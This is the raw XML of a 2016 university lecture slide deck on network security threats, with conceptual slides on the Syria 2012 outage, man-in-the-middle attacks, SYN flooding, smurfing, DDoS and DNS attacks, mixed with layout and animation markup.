            <a:ext cx="698366" cy="593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85" y="4474694"/>
            <a:ext cx="698366" cy="5936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67" y="5185847"/>
            <a:ext cx="698366" cy="5936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8" y="5301720"/>
            <a:ext cx="698366" cy="593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49" y="5177852"/>
            <a:ext cx="698366" cy="5936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40" y="4619093"/>
            <a:ext cx="698366" cy="59361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32" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6060156" y="4073631"/>
            <a:ext cx="2360712" cy="4010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</p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5919188" y="4293736"/>
            <a:ext cx="1341871" cy="8523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</p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5825083" y="4293736"/>
            <a:ext cx="276167" cy="8921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8" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5057214" y="4439240"/>
            <a:ext cx="491703" cy="8797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0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2621823" y="4181098"/>
            <a:ext cx="2331177" cy="4379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</p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3781632" y="4380767"/>
            <a:ext cx="1395698" cy="7970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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1752528" y="3079750"/>
            <a:ext cx="1495415" cy="134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6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2021796" y="1683266"/>
            <a:ext cx="1338993" cy="10103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3" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5195166" y="1090245"/>
            <a:ext cx="1" cy="862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4" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3996653" y="1261097"/>
            <a:ext cx="154045" cy="1316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5" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2798140" y="1498600"/>
            <a:ext cx="911060" cy="10947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1" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5898660" y="1087440"/>
            <a:ext cx="1693533" cy="8407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2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5668764" y="997314"/>
            <a:ext cx="724915" cy="8657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10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8405575" y="263505"/>
            <a:ext cx="3717599" cy="232988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None/>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" sz="2800" dirty="0"/>
              <a:t>Smurfing example</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="sv-SE" sz="2600" dirty="0" smtClean="0"/>
              <a:t>Each node responds to victim</a:t>
            </a:r>
            <a:endParaRPr lang="sv-SE" sz="2600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="48" name="Cloud 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4926617" y="338626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65823" y="3744090"/>
            <a:ext cx="126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Acme Co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398575" y="3241305"/>
            <a:ext cx="658639" cy="39282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143666" y="3407731"/>
            <a:ext cx="519254" cy="2263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321189" y="4691981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69636" y="5268656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25983" y="5371731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14875" y="5290671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926135" y="5212704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164607" y="4515961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6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159 -0.10394 L 0.29519 -0.1713 L 0.34818 -0.21204 L 0.43737 -0.24283 L 0.63321 -0.24144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13 -0.17847 L 0.09466 -0.28218 L 0.14844 -0.32431 L 0.23607 -0.3537 L 0.44453 -0.33981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1.48148E-6 L -0.02839 -0.18033 L 0.00091 -0.27176 L 0.06211 -0.30764 L 0.17435 -0.34607 L 0.42487 -0.33912 " pathEditMode="relative" rAng="0" ptsTypes="AAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="1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173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39 -0.17685 L -0.00482 -0.26666 L 0.04414 -0.30185 L 0.13411 -0.33958 L 0.33477 -0.33264 " pathEditMode="relative" ptsTypes="AAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="1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631 -0.1757 L -0.10196 -0.26135 L -0.053 -0.3007 L 0.03632 -0.33287 L 0.23216 -0.33982 " pathEditMode="relative" ptsTypes="AAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="14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286 -0.09699 L -0.19817 -0.16412 L -0.14609 -0.19653 L -0.05052 -0.23704 L 0.13425 -0.23148 " pathEditMode="relative" ptsTypes="AAAAAA">
                                      <p:cBhvr>
                                        <p:cTn id="1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71" grpId="0" animBg="1"/>
      <p:bldP spid="72" grpId="0" animBg="1"/>
      <p:bldP spid="7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LANs that allow Smurf attacks are badly configured.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One approach is to blacklist these LANs.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19" y="993037"/>
            <a:ext cx="8186738" cy="45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18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Denial of Service (DDoS)	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9875520" cy="736282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F6FC6"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A large number of machines work together to perform an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" cap="none" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attack that prevents valid users from accessing a service.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Common examples: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Slashdot effect – a large number of valid users all try and access at once. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Botnets </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Amazon web services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98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attacks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30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Service (DNS)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DNS service translates human friendly URLs such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://vaniea.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to their IP address such as 69.163.145.230. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Mappings between URLs and IPs are not static. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One domain, such as google.com, may have many IP addresses associated with it. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>One way to get in the middle or deny access is to change a DNS entry record.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0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Syria going offline – November 2012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3443043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Article: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://blog.cloudflare.com/how-syria-turned-off-the-internet/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Going offline:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> 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player.vimeo.com/video/54630037</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Going online: </a:t>
            </a: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://player.vimeo.com/video/54670123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356" y="1845734"/>
            <a:ext cx="6731339" cy="37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3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4359"/>
            <a:ext cx="3409950" cy="1223808"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Syria going offline – November 2012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Article: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://blog.cloudflare.com/how-syria-turned-off-the-internet/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Going offline:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> https://player.vimeo.com/video/54630037</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Going online: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://player.vimeo.com/video/54670123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9202" r="1035"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4200193" y="388409"/>
            <a:ext cx="7991805" cy="49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202" r="1035"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2503300" y="538338"/>
            <a:ext cx="7397158" cy="4621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ine Callout 1 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5467813" y="5342585"/>
            <a:ext cx="2052103" cy="1299762"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val -5288"/>
              <a:gd name="adj2" fmla="val 50266"/>
              <a:gd name="adj3" fmla="val -172422"/>
              <a:gd name="adj4" fmla="val 21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Syria’s network, directly connected to three other networks.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123651" y="800155"/>
            <a:ext cx="2052103" cy="1206066"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 47213"/>
              <a:gd name="adj2" fmla="val 103470"/>
              <a:gd name="adj3" fmla="val 23932"/>
              <a:gd name="adj4" fmla="val 130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number is a network run by a single group.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123651" y="2494337"/>
            <a:ext cx="2052103" cy="2528039"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 21186"/>
              <a:gd name="adj2" fmla="val 102805"/>
              <a:gd name="adj3" fmla="val 36403"/>
              <a:gd name="adj4" fmla="val 142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colored line is the current shortest path between two networks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All lines on this graph connect Syria to other parts of the world.</a:t>
            </a:r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10006905" y="2231922"/>
            <a:ext cx="2052103" cy="2074607"/>
          </a:xfrm>
          <a:prstGeom prst="borderCallout1">
            <a:avLst>
              <a:gd name="adj1" fmla="val 49258"/>
              <a:gd name="adj2" fmla="val 385"/>
              <a:gd name="adj3" fmla="val 61817"/>
              <a:gd name="adj4" fmla="val -38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 shift all the time. This is normal on the internet as the current shortest path is dynamically negotiated (BGP routing).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4359"/>
            <a:ext cx="3409950" cy="1223808"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Syria going offline – November 2012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Article: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://blog.cloudflare.com/how-syria-turned-off-the-internet/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0">
              <a:hlinkClick r:id="rId3"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Going offline:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t> https://player.vimeo.com/video/54630037</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Going online: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://player.vimeo.com/video/54670123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9202" r="1035"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4200193" y="388409"/>
            <a:ext cx="7991805" cy="49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7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threats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Interception</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Unauthorized viewing of information                (Confidentiality)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Modification</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Unauthorized changing of information (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Integrity)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Fabrication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Unauthorized creation of information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 smtClean="0"/>
              <a:t>Integrity)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Interruption</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> – Preventing authorized access </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Availability)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Kami Vaniea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4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 focus on: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 in the middle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Denial of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DNS attack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215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_template" id="{3F508DB1-9FD0-4E78-AED0-68FF0F8360A0}" vid="{F143D4F2-1087-43A2-9B91-529347D3EEE9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2589</TotalTime>
  <Words>1426</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>351</Paragraphs>
  <Slides>40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Retrospect</vt:lpstr>
      <vt:lpstr>Network Security Threats</vt:lpstr>
      <vt:lpstr>First, some news</vt:lpstr>
      <vt:lpstr>Internet attacks and defenses </vt:lpstr>
      <vt:lpstr>Syria going offline – November 2012</vt:lpstr>
      <vt:lpstr>Syria going offline – November 2012</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Syria going offline – November 2012</vt:lpstr>
      <vt:lpstr>Types of threats </vt:lpstr>
      <vt:lpstr>Today we will focus on: </vt:lpstr>
      <vt:lpstr>Man in the middle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is an attack that actually happened to a student of mine when they were trying to download/upload their “set a cookie” homework using a free VPN.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code is downloading more javascript from box.anchorfree.net and running it on the client. </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Denial of Service</vt:lpstr>
      <vt:lpstr>Denial of Service (DoS)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SYN Flooding</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>SYN Flooding</vt:lpstr>
      <vt:lpstr>Spoofing: forged TCP packets</vt:lpstr>
      <vt:lpstr>Smurfing (directed broadcast)</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>LANs that allow Smurf attacks are badly configured.  One approach is to blacklist these LANs.</vt:lpstr>
      <vt:lpstr>Distributed Denial of Service (DDoS) </vt:lpstr>
      <vt:lpstr>DNS attacks</vt:lpstr>
      <vt:lpstr>Domain Name Service (DNS)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 attacks</dc:title>
  <dc:creator>kami.vaniea@gmail.com</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>kami.vaniea@gmail.com</cp:lastModifiedBy>
  <cp:revision>33</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-01-15T10:31:16Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-01-18T00:05:49Z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